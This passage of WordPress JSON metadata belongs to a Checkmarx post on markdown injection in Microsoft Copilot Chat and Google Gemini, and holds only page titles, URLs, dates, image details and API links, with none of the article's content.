it.","og_url":"https:\/\/checkmarx.com\/zero-post\/exploiting-markdown-injection-in-ai-agents-microsoft-copilot-chat-and-google-gemini\/","og_site_name":"Checkmarx","article_publisher":"https:\/\/www.facebook.com\/Checkmarx.Source.Code.Analysis","article_modified_time":"2026-02-27T18:39:36+00:00","og_image":[{"width":2560,"height":1280,"url":"https:\/\/checkmarx.com\/wp-content\/uploads\/2025\/12\/cxzero-feature_copilot-gemini-markdown-injection-in-ai-agents.webp","type":"image\/webp"}],"twitter_card":"summary_large_image","twitter_site":"@checkmarx","twitter_misc":{"Est. reading time":"8 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/checkmarx.com\/zero-post\/exploiting-markdown-injection-in-ai-agents-microsoft-copilot-chat-and-google-gemini\/","url":"https:\/\/checkmarx.com\/zero-post\/exploiting-markdown-injection-in-ai-agents-microsoft-copilot-chat-and-google-gemini\/","name":"Exploiting Markdown Injection in AI agents: Microsoft Copilot Chat and Google\u00a0Gemini - Checkmarx","isPartOf":{"@id":"https:\/\/checkmarx.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/checkmarx.com\/zero-post\/exploiting-markdown-injection-in-ai-agents-microsoft-copilot-chat-and-google-gemini\/#primaryimage"},"image":{"@id":"https:\/\/checkmarx.com\/zero-post\/exploiting-markdown-injection-in-ai-agents-microsoft-copilot-chat-and-google-gemini\/#primaryimage"},"thumbnailUrl":"https:\/\/checkmarx.com\/wp-content\/uploads\/2025\/12\/cxzero-feature_copilot-gemini-markdown-injection-in-ai-agents.webp","datePublished":"2025-12-04T16:30:00+00:00","dateModified":"2026-02-27T18:39:36+00:00","inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/checkmarx.com\/zero-post\/exploiting-markdown-injection-in-ai-agents-microsoft-copilot-chat-and-google-gemini\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/checkmarx.com\/zero-post\/exploiting-markdown-injection-in-ai-agents-microsoft-copilot-chat-and-google-gemini\/#primaryimage","url":"https:\/\/checkmarx.com\/wp-content\/uploads\/2025\/12\/cxzero-feature_copilot-gemini-markdown-injection-in-ai-agents.webp","contentUrl":"https:\/\/checkmarx.com\/wp-content\/uploads\/2025\/12\/cxzero-feature_copilot-gemini-markdown-injection-in-ai-agents.webp","width":2560,"height":1280,"caption":"Street-art-style cyberpunk illustration of two AI chatbot figures with headset silhouettes flanking a computer monitor as a syringe injects code into the screen; neon green, black, purple, and red accents on a gritty graffiti background suggest \u2018markdown injection\u2019 attacks against AI systems"},{"@type":"WebSite","@id":"https:\/\/checkmarx.com\/#website","url":"https:\/\/checkmarx.com\/","name":"Checkmarx","description":"The world runs on code. We secure it.","publisher":{"@id":"https:\/\/checkmarx.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/checkmarx.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/checkmarx.com\/#organization","name":"Checkmarx","url":"https:\/\/checkmarx.com\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/checkmarx.com\/#\/schema\/logo\/image\/","url":"https:\/\/checkmarx.com\/wp-content\/uploads\/2024\/02\/logo-dark.svg","contentUrl":"https:\/\/checkmarx.com\/wp-content\/uploads\/2024\/02\/logo-dark.svg","width":1,"height":1,"caption":"Checkmarx"},"image":{"@id":"https:\/\/checkmarx.com\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/Checkmarx.Source.Code.Analysis","https:\/\/x.com\/checkmarx","https:\/\/www.youtube.com\/user\/CheckmarxResearchLab","https:\/\/www.linkedin.com\/company\/checkmarx"]}]}},"_links":{"self":[{"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/zero-post\/105964","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/zero-post"}],"about":[{"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/types\/zero-post"}],"author":[{"embeddable":true,"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/users\/121"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/media\/105970"}],"wp:attachment":[{"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/media?parent=105964"}],"wp:term":[{"taxonomy":"zero-category","embeddable":true,"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/zero-category?post=105964"},{"taxonomy":"zero-tag","embeddable":true,"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/zero-tag?post=105964"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}